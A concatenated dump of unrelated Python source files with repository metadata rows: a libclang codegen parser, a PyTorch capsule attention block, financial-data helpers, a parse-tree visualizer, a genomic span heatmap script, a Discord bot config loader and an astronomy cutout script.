        content = '\n'.join(fp.read().splitlines(keepends=False))
    # pass: rewrite `[[...]]` with `__attribute__((annotate(...)))`
    for attr in ('vineyard', 'vineyard(streamable)', 'shared', 'distributed'):
        content = content.replace(
            '[[%s]]' % attr, '__attribute__((annotate("%s")))' % attr
        )
    return content, ''
def strip_flags(flags):
    """Return *flags* without ``-c``, ``-O*`` optimization levels, and
    ``-Werror`` — none of which matter when only parsing the AST, and
    ``-Werror`` would turn harmless diagnostics into failures."""
    stripped_flags = []
    for flag in flags:
        # NB: compare the individual flag; the original compared the whole
        # `flags` list against '-Werror', so '-Werror' was never stripped.
        if flag == '-c' or flag.startswith('-O') or flag == '-Werror':
            continue
        stripped_flags.append(flag)
    return stripped_flags
def resolve_include(inc_node, system_includes, includes):
    """Resolve an ``#include "xxx.vineyard.h"`` directive to the full path
    of the generated header, provided the matching ``.vineyard-mod`` source
    is readable on one of the include paths; otherwise ``None``."""
    inc_name = inc_node.spelling
    if not inc_name.endswith('.vineyard.h'):  # os.path.splitext won't work
        return None
    mod_name = inc_name[: -len(".vineyard.h")] + ".vineyard-mod"
    candidates = (
        os.path.join(inc, inc_name)
        for inc in itertools.chain(system_includes, includes)
        if os.path.isfile(os.path.join(inc, mod_name))
        and os.access(os.path.join(inc, mod_name), os.R_OK)
    )
    return next(candidates, None)
def generate_parsing_flags(
    source,
    system_includes=None,
    includes=None,
    extra_flags=None,
    build_directory=None,
    delayed=True,
):
    """Assemble the clang command line used to parse *source*.

    Flags come from the compilation database in *build_directory* when one
    is available (stripped of options irrelevant to parsing), otherwise
    from the semicolon-separated *system_includes*/*includes* paths;
    *extra_flags* are appended in either case.
    """
    # NB:
    # `-nostdinc` and `-nostdinc++`: to avoid libclang finding an incorrect
    # gcc installation.
    # `-Wunused-private-field`: we skip parsing the function bodies.
    base_flags = [
        '-x',
        'c++',
        '-std=c++14',
        '-nostdinc',
        '-nostdinc++',
        '-D__VPP=1',
    ]
    warning_flags = [
        '-Wno-unused-function',
        '-Wno-unused-parameter',
        '-Wno-unused-private-field',
        '-Wno-unknown-warning-option',
    ]
    # prepare flags
    flags = None
    compliation_db = parse_compilation_database(build_directory)
    if compliation_db is not None:
        commands = compliation_db.getCompileCommands(source)
        if commands is not None and len(commands) > 0:
            # strip compiler name (first) and source file (last) arguments
            flags = strip_flags(list(commands[0].arguments)[1:-1])
            # adapts to libclang v14.0.1, which appends a trailing '--'
            if flags and flags[-1] == '--':
                flags.pop(-1)
            # NB: even when using the compilation database we still need to
            # include the system includes, since we pass `-nostdinc{++}`.
            if system_includes:
                for inc in system_includes.split(';'):
                    flags.append('-isystem')
                    flags.append(inc)
            if extra_flags:
                flags.extend(extra_flags)
    if flags is None:
        # fall back to explicitly supplied include paths
        flags = []
        if system_includes:
            for inc in system_includes.split(';'):
                flags.append('-isystem')
                flags.append(inc)
        if includes:
            for inc in includes.split(';'):
                flags.append('-I%s' % inc)
        if extra_flags:
            flags.extend(extra_flags)
    if delayed:
        flags.append('-fdelayed-template-parsing')
    else:
        flags.append('-fno-delayed-template-parsing')
    return base_flags + flags + warning_flags
def parse_module(  # noqa: C901
    root_directory,
    source,
    target=None,
    system_includes=None,
    includes=None,
    extra_flags=None,
    build_directory=None,
    delayed=True,
    parse_only=True,
    verbose=False,
):
    """Parse *source* with libclang and collect the codegen targets.

    Returns ``(content, to_reflect, to_include, parse_flags)``: the
    annotation-rewritten file content, the annotated classes to reflect,
    the inclusion directives found, and the clang flags that were used.

    NOTE(review): *root_directory* and *target* are accepted but never used
    in this body.
    """
    # prepare inputs
    content, message = validate_and_strip_input_file(source)
    if content is None:
        raise RuntimeError('Invalid input: %s' % message)
    # feed the rewritten content to clang without touching the file on disk
    unsaved_files = [(source, content)]
    # parse
    index = cindex.Index.create()
    options = (
        ParseOption.Default
        | ParseOption.DetailedPreprocessingRecord
        | ParseOption.SkipFunctionBodies
        | ParseOption.IncludeAttributedTypes
        | ParseOption.KeepGoing
    )
    parse_flags = generate_parsing_flags(
        source,
        system_includes=system_includes,
        includes=includes,
        extra_flags=extra_flags,
        build_directory=build_directory,
        delayed=delayed,
    )
    if parse_only:
        options |= ParseOption.SingleFileParse
    unit = index.parse(
        source, unsaved_files=unsaved_files, args=parse_flags, options=options
    )
    if not parse_only:
        # surface diagnostics, restricted to this file unless verbose
        for diag in unit.diagnostics:
            if verbose or (
                diag.location
                and diag.location.file
                and diag.location.file.name == source
            ):
                logging.warning(diag)
    # traverse
    modules = filter_the_module(unit.cursor, source)
    to_reflect, to_include = [], []
    for module in modules:
        if verbose:
            dump_ast(module)
        traverse(module, to_reflect, to_include)
    return content, to_reflect, to_include, parse_flags
def parse_deps(
    root_directory,
    source,
    target=None,
    system_includes=None,
    includes=None,
    extra_flags=None,
    build_directory=None,
    delayed=True,
    verbose=False,
):
    """Parse *source* and print each resolved ``.vineyard.h`` dependency as
    a ``Depends:<path>`` line (consumed by the build system)."""
    _, _, to_include, parse_flags = parse_module(
        root_directory=root_directory,
        source=source,
        target=target,
        system_includes=system_includes,
        includes=includes,
        extra_flags=extra_flags,
        build_directory=build_directory,
        delayed=delayed,
        parse_only=True,
        verbose=verbose,
    )
    logging.info('Generating for %s ...', os.path.basename(source))
    # analyze include directories from parse flags
    i, include_in_flags = 0, []
    while i < len(parse_flags):
        if parse_flags[i].startswith('-I'):
            if parse_flags[i][2:]:
                # fused `-Ipath` form
                include_in_flags.append(parse_flags[i][2:])
            else:
                # bare `-I path` form: the path is the next argument
                include_in_flags.append(parse_flags[i + 1])
                i += 1
        if parse_flags[i] == '-isystem':
            # `-isystem path`: the path is the next argument
            include_in_flags.append(parse_flags[i + 1])
            i += 1
        i += 1
    for inc in to_include:
        header = resolve_include(inc, [], include_in_flags)
        if header is not None:
            print('Depends:%s' % header.strip())
| 30.938065 | 88 | 0.589356 | 2,659 | 23,977 | 5.124107 | 0.163219 | 0.021798 | 0.009908 | 0.007927 | 0.302165 | 0.230459 | 0.195963 | 0.178202 | 0.163743 | 0.13622 | 0 | 0.008521 | 0.304959 | 23,977 | 774 | 89 | 30.978036 | 0.809061 | 0.07795 | 0 | 0.299003 | 0 | 0 | 0.069922 | 0.010683 | 0 | 0 | 0.003622 | 0.001292 | 0 | 1 | 0.05814 | false | 0 | 0.023256 | 0.01495 | 0.214286 | 0.003322 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e6f59b3583ebc06871f63cd872b675f08d814d4 | 2,482 | py | Python | agscaps/layers/attention.py | clementpoiret/3D-AGSCaps | 475eb1915bc1425cebbd0bec36e9096c9c2cb53c | [
"MIT"
] | 1 | 2021-08-30T14:46:42.000Z | 2021-08-30T14:46:42.000Z | agscaps/layers/attention.py | clementpoiret/3D-AGSCaps | 475eb1915bc1425cebbd0bec36e9096c9c2cb53c | [
"MIT"
] | null | null | null | agscaps/layers/attention.py | clementpoiret/3D-AGSCaps | 475eb1915bc1425cebbd0bec36e9096c9c2cb53c | [
"MIT"
] | null | null | null | from einops import rearrange
from torch import nn
from .switchnorm import SwitchNorm3d
class AttentionBlock(nn.Module):
    """
    3D Caps Attention Block w/ optional Normalization.

    For normalization, it supports:
    - `b` for `BatchNorm3d`,
    - `s` for `SwitchNorm3d`.

    `using_bn` controls SwitchNorm's behavior. It has no effect if
    `normalization == "b"`.

    SwitchNorm3d comes from:
    <https://github.com/switchablenorms/Switchable-Normalization>
    """

    def __init__(self,
                 F_g,
                 F_l,
                 F_int,
                 F_out=1,
                 normalization=None,
                 using_bn=False):
        super(AttentionBlock, self).__init__()

        def conv1x1(in_channels, out_channels):
            # 1x1x1 convolution shared by the gating/signal/psi branches
            return nn.Conv3d(
                in_channels,
                out_channels,
                kernel_size=1,
                stride=1,
                padding=0,
                bias=True,
            )

        W_g = [conv1x1(F_g, F_int)]
        W_x = [conv1x1(F_l, F_int)]
        psi = [conv1x1(F_int, F_out)]

        branches = ((W_g, F_int), (W_x, F_int), (psi, F_out))
        if normalization == "b":
            for layers, channels in branches:
                layers.append(nn.BatchNorm3d(channels))
        elif normalization == "s":
            for layers, channels in branches:
                layers.append(SwitchNorm3d(channels, using_bn=using_bn))

        # psi ends with a sigmoid to produce attention weights in [0, 1]
        psi.append(nn.Sigmoid())

        self.W_g = nn.Sequential(*W_g)
        self.W_x = nn.Sequential(*W_x)
        self.psi = nn.Sequential(*psi)
        self.relu = nn.ReLU(inplace=True)

    def forward(self, x, g):
        # g & x should normally have the same shape here; fold the capsule
        # axis into channels before the 1x1x1 convolutions.
        g_flat = self.W_g(rearrange(g, "b c a h w d -> b (c a) h w d"))
        x_flat = self.W_x(rearrange(x, "b c a h w d -> b (c a) h w d"))
        attention = self.psi(self.relu(g_flat + x_flat))
        # Unsqueeze to match capsule dimension
        attention = rearrange(attention, "b a h w d -> b 1 a h w d")
        return x * attention
| 26.978261 | 67 | 0.487107 | 305 | 2,482 | 3.809836 | 0.321311 | 0.048193 | 0.015491 | 0.020654 | 0.22117 | 0.177281 | 0.177281 | 0.177281 | 0.115318 | 0.086059 | 0 | 0.019877 | 0.412168 | 2,482 | 91 | 68 | 27.274725 | 0.776559 | 0.183723 | 0 | 0.365079 | 0 | 0 | 0.041519 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031746 | false | 0 | 0.047619 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e73d1d5556ab04d773f69a0f3d3e8c3476ff40d | 2,199 | py | Python | alphamind/data/engines/utilities.py | atefar2/alpha-mind | 66d839affb5d81d31d5cac7e5e224278e3f99a8b | [
"MIT"
] | 1 | 2020-05-18T20:57:25.000Z | 2020-05-18T20:57:25.000Z | alphamind/data/engines/utilities.py | atefar2/alpha-mind | 66d839affb5d81d31d5cac7e5e224278e3f99a8b | [
"MIT"
] | null | null | null | alphamind/data/engines/utilities.py | atefar2/alpha-mind | 66d839affb5d81d31d5cac7e5e224278e3f99a8b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on 2017-12-25
@author: cheng.li
"""
from typing import Dict
from typing import Iterable
from alphamind.data.dbmodel.models import Categories
from alphamind.data.dbmodel.models import Market
from alphamind.data.dbmodel.models import RiskCovDay
from alphamind.data.dbmodel.models import RiskCovLong
from alphamind.data.dbmodel.models import RiskCovShort
from alphamind.data.dbmodel.models import RiskExposure
from alphamind.data.dbmodel.models import SpecificRiskDay
from alphamind.data.dbmodel.models import SpecificRiskLong
from alphamind.data.dbmodel.models import SpecificRiskShort
from alphamind.data.dbmodel.models import Uqer
from alphamind.data.engines.industries import INDUSTRY_MAPPING
factor_tables = [Market, RiskExposure, Uqer, Categories]
def _map_risk_model_table(risk_model: str) -> tuple:
if risk_model == 'day':
return RiskCovDay, SpecificRiskDay
elif risk_model == 'short':
return RiskCovShort, SpecificRiskShort
elif risk_model == 'long':
return RiskCovLong, SpecificRiskLong
else:
raise ValueError("risk model name {0} is not recognized".format(risk_model))
def _map_factors(factors: Iterable[str], used_factor_tables) -> Dict:
factor_cols = {}
factors = set(factors).difference({'trade_date', 'code', 'isOpen'})
to_keep = factors.copy()
for f in factors:
for t in used_factor_tables:
if f in t.__table__.columns:
factor_cols[t.__table__.columns[f]] = t
to_keep.remove(f)
break
if to_keep:
raise ValueError("factors in <{0}> can't be find".format(to_keep))
return factor_cols
def _map_industry_category(category: str) -> str:
if category == 'sw':
return '申万行业分类'
elif category == 'sw_adj':
return '申万行业分类修订'
elif category == 'zz':
return '中证行业分类'
elif category == 'dx':
return '东兴行业分类'
elif category == 'zjh':
return '证监会行业V2012'
else:
raise ValueError("No other industry is supported at the current time")
def industry_list(category: str, level: int = 1) -> list:
    """Return the industry names for *category* at classification *level*
    (defaults to the top level), looked up from ``INDUSTRY_MAPPING``."""
    return INDUSTRY_MAPPING[category][level]
| 30.971831 | 84 | 0.701228 | 275 | 2,199 | 5.465455 | 0.370909 | 0.095143 | 0.124418 | 0.159681 | 0.239521 | 0.239521 | 0 | 0 | 0 | 0 | 0 | 0.009122 | 0.202365 | 2,199 | 70 | 85 | 31.414286 | 0.847777 | 0.028649 | 0 | 0.039216 | 0 | 0 | 0.093985 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078431 | false | 0 | 0.254902 | 0.019608 | 0.529412 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e765dd615cf6bdf3b7653fede443774c268c114 | 5,307 | py | Python | part7/python/genptdot.py | fazillatheef/lsbasi | 07e1a14516156a21ebe2d82e0bae4bba5ad73dd6 | [
"MIT"
] | 1,682 | 2015-06-15T11:42:03.000Z | 2022-03-29T12:40:35.000Z | part7/python/genptdot.py | fazillatheef/lsbasi | 07e1a14516156a21ebe2d82e0bae4bba5ad73dd6 | [
"MIT"
] | 10 | 2017-06-22T11:35:21.000Z | 2022-02-26T17:37:42.000Z | part7/python/genptdot.py | fazillatheef/lsbasi | 07e1a14516156a21ebe2d82e0bae4bba5ad73dd6 | [
"MIT"
] | 493 | 2015-07-05T09:05:09.000Z | 2022-03-28T03:33:33.000Z | ###############################################################################
# #
# Parse Tree visualizer #
# #
# To generate an image from the DOT file run: #
# $ dot -Tpng -o parsetree.png parsetree.dot #
# #
###############################################################################
import argparse
import textwrap
from spi import PLUS, MINUS, MUL, DIV, INTEGER, LPAREN, RPAREN, Lexer
class Node(object):
    """A parse-tree node: a display name plus an ordered child list."""

    def __init__(self, name):
        self.name = name
        self.children = []

    def add(self, node):
        """Attach *node* as the rightmost child."""
        self.children.append(node)
class RuleNode(Node):
    # Interior node representing a grammar rule (expr / term / factor).
    pass


class TokenNode(Node):
    # Leaf node holding a consumed token's value.
    pass
class Parser(object):
    """Parses the input and builds a parse tree.

    Each grammar method saves ``self.current_node``, attaches a new
    RuleNode, makes it current while parsing its sub-rules (so eaten
    tokens land under it), then restores the saved node.
    """

    def __init__(self, lexer):
        self.lexer = lexer
        # set current token to the first token taken from the input
        self.current_token = self.lexer.get_next_token()
        # Parse tree root
        self.root = None
        self.current_node = None

    def error(self):
        # raised whenever the current token does not match the grammar
        raise Exception('Invalid syntax')

    def eat(self, token_type):
        # compare the current token type with the passed token
        # type and if they match then "eat" the current token
        # and assign the next token to the self.current_token,
        # otherwise raise an exception.
        if self.current_token.type == token_type:
            self.current_node.add(TokenNode(self.current_token.value))
            self.current_token = self.lexer.get_next_token()
        else:
            self.error()

    def factor(self):
        """factor : INTEGER | LPAREN expr RPAREN"""
        node = RuleNode('factor')
        self.current_node.add(node)
        _save = self.current_node
        self.current_node = node

        token = self.current_token
        if token.type == INTEGER:
            self.eat(INTEGER)
        elif token.type == LPAREN:
            self.eat(LPAREN)
            self.expr()
            self.eat(RPAREN)

        self.current_node = _save

    def term(self):
        """term : factor ((MUL | DIV) factor)*"""
        node = RuleNode('term')
        self.current_node.add(node)
        _save = self.current_node
        self.current_node = node

        self.factor()

        while self.current_token.type in (MUL, DIV):
            token = self.current_token
            if token.type == MUL:
                self.eat(MUL)
            elif token.type == DIV:
                self.eat(DIV)
            self.factor()

        self.current_node = _save

    def expr(self):
        """
        expr : term ((PLUS | MINUS) term)*
        term : factor ((MUL | DIV) factor)*
        factor : INTEGER | LPAREN expr RPAREN
        """
        # the outermost expr becomes the tree root
        node = RuleNode('expr')
        if self.root is None:
            self.root = node
        else:
            self.current_node.add(node)
        _save = self.current_node
        self.current_node = node

        self.term()

        while self.current_token.type in (PLUS, MINUS):
            token = self.current_token
            if token.type == PLUS:
                self.eat(PLUS)
            elif token.type == MINUS:
                self.eat(MINUS)
            self.term()

        self.current_node = _save

    def parse(self):
        # build and return the parse tree for the whole input expression
        self.expr()
        return self.root
class ParseTreeVisualizer(object):
    """Renders the parser's parse tree as Graphviz DOT text, numbering
    nodes in breadth-first order."""

    def __init__(self, parser):
        self.parser = parser
        # NOTE(review): self.ncount is never read; bfs() keeps its own
        # local counter instead.
        self.ncount = 1
        self.dot_header = [textwrap.dedent("""\
digraph astgraph {
node [shape=none, fontsize=12, fontname="Courier", height=.1];
ranksep=.3;
edge [arrowsize=.5]
""")]
        self.dot_body = []
        self.dot_footer = ['}']

    def bfs(self, node):
        # Emit one DOT node statement per tree node and one edge per
        # parent->child pair; `_num` stores each node's DOT identifier.
        ncount = 1
        queue = []
        queue.append(node)
        s = ' node{} [label="{}"]\n'.format(ncount, node.name)
        self.dot_body.append(s)
        node._num = ncount
        ncount += 1

        while queue:
            node = queue.pop(0)
            for child_node in node.children:
                s = ' node{} [label="{}"]\n'.format(ncount, child_node.name)
                self.dot_body.append(s)
                child_node._num = ncount
                ncount += 1
                s = ' node{} -> node{}\n'.format(node._num, child_node._num)
                self.dot_body.append(s)
                queue.append(child_node)

    def gendot(self):
        # parse the input, walk the tree, and assemble the DOT document
        tree = self.parser.parse()
        self.bfs(tree)
        return ''.join(self.dot_header + self.dot_body + self.dot_footer)
def main():
    """CLI entry point: read an arithmetic expression from argv and print
    the corresponding parse tree as Graphviz DOT text."""
    argparser = argparse.ArgumentParser(
        description='Generate a Parse Tree DOT file.'
    )
    argparser.add_argument(
        'text',
        help='Arithmetic expression (in quotes): "1 + 2 * 3"'
    )
    args = argparser.parse_args()

    viz = ParseTreeVisualizer(Parser(Lexer(args.text)))
    print(viz.gendot())


if __name__ == '__main__':
    main()
| 28.079365 | 79 | 0.502355 | 564 | 5,307 | 4.592199 | 0.23227 | 0.101931 | 0.081081 | 0.027799 | 0.314286 | 0.249421 | 0.210811 | 0.101158 | 0.072587 | 0.072587 | 0 | 0.003869 | 0.366874 | 5,307 | 188 | 80 | 28.228723 | 0.766964 | 0.179574 | 0 | 0.256 | 0 | 0 | 0.084142 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.104 | false | 0.016 | 0.024 | 0 | 0.184 | 0.008 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e7a0058fbea491f699fa61765f3d5eee1324b52 | 2,228 | py | Python | scripts/span_analysis.py | bruhad-dave/Contextualize-SNVs | 0375ac69c0812e3bde079911e42c3b57cb7fe63d | [
"MIT"
] | null | null | null | scripts/span_analysis.py | bruhad-dave/Contextualize-SNVs | 0375ac69c0812e3bde079911e42c3b57cb7fe63d | [
"MIT"
] | null | null | null | scripts/span_analysis.py | bruhad-dave/Contextualize-SNVs | 0375ac69c0812e3bde079911e42c3b57cb7fe63d | [
"MIT"
] | null | null | null | ## importing
## importing
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import argparse
import os

## parsing arguments
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--infile", help="Input file containing SNV data")
parser.add_argument("-s", "--sample", help="The name of the sample (will be applied to any output files)")
parser.add_argument("-o", "--outpath", help="Folder where output heatmaps will be generated")
args = parser.parse_args()

sample = args.sample
infile = args.infile
outpath = args.outpath
out = os.path.abspath(outpath)

# the input is read as a single-column frame, one line per row
spans = pd.read_csv(infile, sep="\t", header=None)
#print(spans.head(5))

# split FASTA-style lines: headers (contain ">") vs sequence lines;
# headers and sequences are assumed to alternate -- TODO confirm
loci = []
nuc = []
for i in spans[0]:
    if (">") in i:
        loci.append(i)
    else:
        nuc.append(i)
print(len(loci))
print(len(nuc))
def typify(s):
    """Format a sequence as ``focal:left-right``, where *focal* is the
    middle nucleotide and *left*/*right* are its flanking subsequences."""
    mid = int((len(s) - 1) / 2)
    focal, left, right = s[mid], s[:mid], s[mid + 1:]
    return focal + ":" + left + "-" + right
# map each locus header to its sequence line
span_dict = dict(zip(loci, nuc))
#print(span_dict)

span_df = pd.DataFrame.from_dict(span_dict, orient="index")
span_df.reset_index(inplace=True)
span_df.columns = ["Coordinate", "Span"]
#print(span_df.head(5))

# annotate each span with its 'focal:left-right' context string
span_df["Focal:Flank"] = span_df.apply(lambda row : typify(row["Span"]), axis = 1)
# count occurrences of each distinct context
delt, flank = np.unique(span_df["Focal:Flank"], return_counts= True)
del_dict = dict(zip(delt, flank))
#print(span_df.head(5))
#print(del_dict)

del_df = pd.DataFrame.from_dict(del_dict, orient="index")
del_df.reset_index(inplace=True)
del_df.columns = ["Focal:Flank", "Count"]
#print(del_df.head(5))
# split the context string back into focal base and flank columns
del_df[["Focal", "Flank"]] = del_df["Focal:Flank"].str.split(":", n = 1, expand = True)
#print(del_df.head(5))

## plotting
ax = plt.axes()
ax.set_facecolor("cornflowerblue")
# keep only the frequent contexts so the heatmap stays readable
subset = del_df[del_df["Count"] >= 150]
# NOTE(review): positional pivot() arguments were removed in pandas 2.x;
# may need index=/columns=/values= keywords depending on the pinned version.
sub_map = subset.pivot("Flank", "Focal", "Count")
sns.heatmap(sub_map, vmin=0, vmax=800, linewidths=.5, cmap = "icefire", annot=True, fmt="n", annot_kws={"fontsize":6}, yticklabels=1)
plt.savefig(out+"/"+sample+"_spans.svg", format="svg")
plt.savefig(out+"/"+sample+"_spans.png", format="png")
#plt.show()
## done, hopefully
| 30.108108 | 133 | 0.694794 | 351 | 2,228 | 4.287749 | 0.424501 | 0.0299 | 0.018605 | 0.022591 | 0.131561 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011265 | 0.123429 | 2,228 | 73 | 134 | 30.520548 | 0.759345 | 0.137792 | 0 | 0 | 0 | 0 | 0.177708 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020408 | false | 0 | 0.122449 | 0 | 0.142857 | 0.040816 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e7bf95ea5c820bd05ddb3b99a7d3a87403fd019 | 3,877 | py | Python | environment.py | dldhk97/UtilityBot | e49e70c27c824506cac4b146f43b421606d02ec5 | [
"MIT"
] | null | null | null | environment.py | dldhk97/UtilityBot | e49e70c27c824506cac4b146f43b421606d02ec5 | [
"MIT"
] | null | null | null | environment.py | dldhk97/UtilityBot | e49e70c27c824506cac4b146f43b421606d02ec5 | [
"MIT"
] | null | null | null | import os
import sys
from dotenv import load_dotenv
# TODO: add per-target settings for Linux and win32.
# TODO: verify settings per Python version (3.5 – 3.8?).
def load_env():
    """Load all bot settings from the .env file into the BotEnv singleton."""
    load_dotenv()  # load bot environment
    bot_env = BotEnv.instance()

    # (key, is_emoji) pairs, read in the original order.
    for key, is_emoji in (
        ('BOT_TOKEN', False),
        ('PREFIX', False),
        ('OWNER_ID', False),
        ('USE_GAMIE_MODE', False),
        ('USE_GAMIE_REACTION_MODE', False),
        ('GAMIE_EMOJI', True),
        ('USE_SPOILER_REACTION_MODE', False),
        ('SPOILER_MENTION', False),
        ('SPOILER_REACTION_EMOJI', True),
        ('UNSPOILER_REACTION_EMOJI', True),
        ('MOVE_MENTION', False),
        ('USE_IMPORTANT_CHANNEL_REACTION_MODE', False),
        ('IMPORTANT_CHANNEL_ID', False),
        ('IMPORTANT_CHANNEL_REACTION_EMOJI', True),
        ('USE_TRASH_CHANNEL_REACTION_MODE', False),
        ('TRASH_CHANNEL_ID', False),
        ('TRASH_CHANNEL_REACTION_EMOJI', True),
    ):
        bot_env.env_initialize(key, is_emoji)

    # Mandatory settings: abort startup when any of these is missing.
    _env_none_check('BOT_TOKEN', '봇 토큰이 없습니다.')
    _env_none_check('PREFIX', 'PREFIX가 없습니다.')
    _env_none_check('OWNER_ID', '관리자 ID가 없습니다.')

    # Optional feature modes: when enabled, their emoji/channel settings become
    # mandatory and reaction emojis are registered.
    if bot_env.get_env('USE_GAMIE_MODE'):
        _env_none_check('GAMIE_EMOJI', '개미 옵션이 켜져있지만, 개미 이모지가 설정되어있지 않습니다.')
    if bot_env.get_env('USE_GAMIE_REACTION_MODE'):
        _env_none_check('GAMIE_EMOJI', '개미 리액션 옵션이 켜져있지만, 개미 이모지가 설정되어있지 않습니다.')
        bot_env._reaction_emojies.append('GAMIE_EMOJI')
    if bot_env.get_env('USE_SPOILER_REACTION_MODE'):
        _env_none_check('SPOILER_REACTION_EMOJI', '스포일러 옵션이 켜져있지만, 스포일러 이모지가 설정되어있지 않습니다.')
        _env_none_check('UNSPOILER_REACTION_EMOJI', '스포일러 옵션이 켜져있지만, 언스포일러 이모지가 설정되어있지 않습니다.')
        bot_env._reaction_emojies.append('SPOILER_REACTION_EMOJI')
        bot_env._reaction_emojies.append('UNSPOILER_REACTION_EMOJI')
    if bot_env.get_env('USE_IMPORTANT_CHANNEL_REACTION_MODE'):
        _env_none_check('IMPORTANT_CHANNEL_ID', '중요 채널 리액션 이동 모드가 켜져있지만, 채널 ID가 설정되어있지 않습니다.')
        _env_none_check('IMPORTANT_CHANNEL_REACTION_EMOJI', '중요 채널 리액션 이동 모드가 켜져있지만, 리액션 이모지가 설정되어있지 않습니다.')
        bot_env._reaction_emojies.append('IMPORTANT_CHANNEL_REACTION_EMOJI')
    if bot_env.get_env('USE_TRASH_CHANNEL_REACTION_MODE'):
        _env_none_check('TRASH_CHANNEL_ID', '휴지통 채널 리액션 모드가 켜져있지만, 채널 ID가 설정되어있지 않습니다.')
        _env_none_check('TRASH_CHANNEL_REACTION_EMOJI', '휴지통 채널 리액션 모드가 켜져있지만, 리액션 이모지가 설정되어있지 않습니다.')
        bot_env._reaction_emojies.append('TRASH_CHANNEL_REACTION_EMOJI')
def _env_none_check(key, error_msg):
    """Raise with ``error_msg`` when ``key`` is missing or falsy in BotEnv."""
    value = BotEnv.instance().get_env(key)
    if not value:
        raise Exception(error_msg)
def _emoji_convert(src):
src = src.replace('+', '')
if '1F' in src:
src = '\\U000' + src[1:]
else:
src = '\\u' + src[1:]
src = src.encode("latin_1").decode("raw_unicode_escape").encode('utf-16', 'surrogatepass').decode('utf-16')
return src
class BotEnv():
    """Singleton store for the bot's environment configuration.

    The first call to ``BotEnv.instance()`` creates the instance and then
    rebinds ``instance`` to a plain getter, so every later call returns the
    same object.
    """
    _instance = None

    @classmethod
    def _getInstance(cls):
        return cls._instance

    @classmethod
    def instance(cls, *args, **kargs):
        cls._instance = cls(*args, **kargs)
        # Rebind so subsequent calls reuse the stored instance.
        cls.instance = cls._getInstance
        return cls._instance

    def __init__(self):
        self._env = {}               # key -> parsed environment value
        self._reaction_emojies = []  # keys of emojis registered as reactions

    def set_env(self, key, value):
        """Store a value, converting the strings 'True'/'False' to booleans."""
        if value == 'True':
            value = True
        elif value == 'False':
            value = False
        self._env[key] = value

    # get env arg from .env file
    def env_initialize(self, key, is_emoji=False):
        """Read ``key`` from the process environment into the singleton.

        Missing variables are stored as ``False``.  Bugfix: the missing-value
        check now runs *before* the emoji conversion; previously an unset
        emoji variable crashed in ``_emoji_convert(None)``.
        """
        arg = os.getenv(key)
        if arg is None:
            arg = False
        elif is_emoji:
            arg = _emoji_convert(arg)
        BotEnv.instance().set_env(key, arg)

    def get_env(self, key):
        return self._env[key]
5e7c7bbf20a84fbc8017daf22376e9600de397fa | 9,455 | py | Python | scripts/retrieve_image_cutouts.py | nithyanandan/AstroUtils | 97473f52d4247bb9c8507598899215d0662e8d6f | [
"MIT"
] | 1 | 2018-10-31T03:49:39.000Z | 2018-10-31T03:49:39.000Z | scripts/retrieve_image_cutouts.py | nithyanandan/AstroUtils | 97473f52d4247bb9c8507598899215d0662e8d6f | [
"MIT"
] | 5 | 2017-11-18T01:45:50.000Z | 2020-05-30T12:26:50.000Z | scripts/retrieve_image_cutouts.py | nithyanandan/AstroUtils | 97473f52d4247bb9c8507598899215d0662e8d6f | [
"MIT"
] | 1 | 2019-10-14T08:44:40.000Z | 2019-10-14T08:44:40.000Z | #!python
import os.path
import numpy as NP
import yaml, argparse, warnings
from astroquery.skyview import SkyView
from astropy.coordinates import SkyCoord
from astropy import units as U
from astropy.io import ascii, fits
from astropy.table import Table
import astroutils
astroutils_path = astroutils.__path__[0]+'/'

if __name__ == '__main__':
    # Retrieve SkyView image cutouts (or just their URLs) for a catalog of
    # sky coordinates described by a YAML parameter file.

    ## Parse input arguments
    parser = argparse.ArgumentParser(description='Program to retrieve image cutouts')
    input_group = parser.add_argument_group('Input parameters', 'Input specifications')
    input_group.add_argument('-i', '--infile', dest='infile', default=astroutils_path+'examples/image_cutout/image_cutout_parms.yaml', type=str, required=False, help='File specifying input parameters for retrieving image cutouts')
    args = vars(parser.parse_args())

    with open(args['infile'], 'r') as parms_file:
        parms = yaml.safe_load(parms_file)

    # Output locations and coordinate-column configuration.
    projectdir = parms['dirStruct']['projectdir']
    outdir = projectdir + parms['dirStruct']['outdir']
    coordinfo = parms['coordinates']
    catalogfile = coordinfo['infile']
    ra_colname = coordinfo['RA_colname']
